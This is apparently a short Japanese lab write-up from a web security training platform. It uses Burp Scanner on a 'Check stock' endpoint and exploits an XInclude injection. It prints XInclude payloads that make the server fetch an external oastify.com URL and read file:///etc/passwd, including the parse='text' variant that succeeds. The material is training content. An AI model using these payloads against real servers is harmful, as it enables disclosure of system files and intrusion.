Hello there, ('ω')ノ
ターゲットスキャンを使用して素早く脆弱性を発見するを。
このラボには、サーバから任意のファイルを読み取ることができる脆弱性が含まれ。
このラボを解決するには、10分以内に /etc/passwd の内容を取得して。
時間が非常に限られているため、Burp Scannerを使用することをお勧めして。
全体のサイトをスキャンして脆弱性を特定することもできますが、
それではラボを解決するための十分な時間が残らない場合があり。
代わりに、脆弱性がありそうなエンドポイントを直感的に特定し、
特定のリクエストに対してターゲットスキャンを実行して。
Burp Scannerが攻撃ベクトルを特定したら、自分自身の専門知識を使って、
それを悪用する方法を見つけることができて。
今回の脆弱性のターゲットとなるエンドポイントは、Check stock機能とすることに。
Check stockのリクエストに対してアクティブスキャンを。
いくつかの脆弱性が発見され。
アプリケーションが任意の外部 URL のコンテンツを取得して、
それらのコンテンツをレスポンスで返すことができるようで。
その一部のペイロードを利用することに。
XIncludeは、http://www.w3.org/2001/XIncludeのinclude要素で
含まれる外部ドキュメントを参照して。
xi:include要素には、含めるファイルを指すURLを含むhref属性があって。
<rwp xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="http://nc3qqwn
hvi0zwnids005zmlco3uwim6nufh55u.oastify.com/foo"/>
</rwp>
/etc/passwdといった課題がでていたので、下記のようにペイロードを変更すると
うまくいかず。
<rwp xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include href="file:///etc/passwd"/>
</rwp>
parse="text"属性を使用して、未解析の非XMLテキストを含めることができるようで。
下記のようにペイロードを改修してSendすると。
<rwp xmlns:xi="http://www.w3.org/2001/XInclude">
<xi:include parse="text" href="file:///etc/passwd"/>
</rwp>
クリアできて。
画像は別で実施したものですが。
Best regards, (^^ゞ